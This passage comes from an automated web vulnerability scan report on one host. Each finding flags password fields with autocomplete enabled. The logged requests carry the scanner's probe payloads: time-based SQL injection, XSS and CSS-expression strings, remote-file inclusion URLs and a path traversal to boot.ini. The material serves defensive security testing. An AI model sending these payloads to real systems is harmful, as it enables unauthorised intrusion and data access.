Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.94. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.95. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.96. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.97. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000031)%3c/script%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%3Cscript%3Ens(0x000031)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000031)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.98. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x00004C))%7D

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=body%7Bx:expression(netsparker(0x00004C))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x00004C))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.99. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x00001d

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=//netsparker.com/n/n.css?0x00001D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x00001d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.100. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.101. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.102. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1+AND+'NS%3d'ss

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.103. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.104. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.105. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.106. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.107. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.108. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.109. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.110. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=*/netsparker(0x000047)%3b/*

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=*/netsparker(0x000047)%3B/* HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
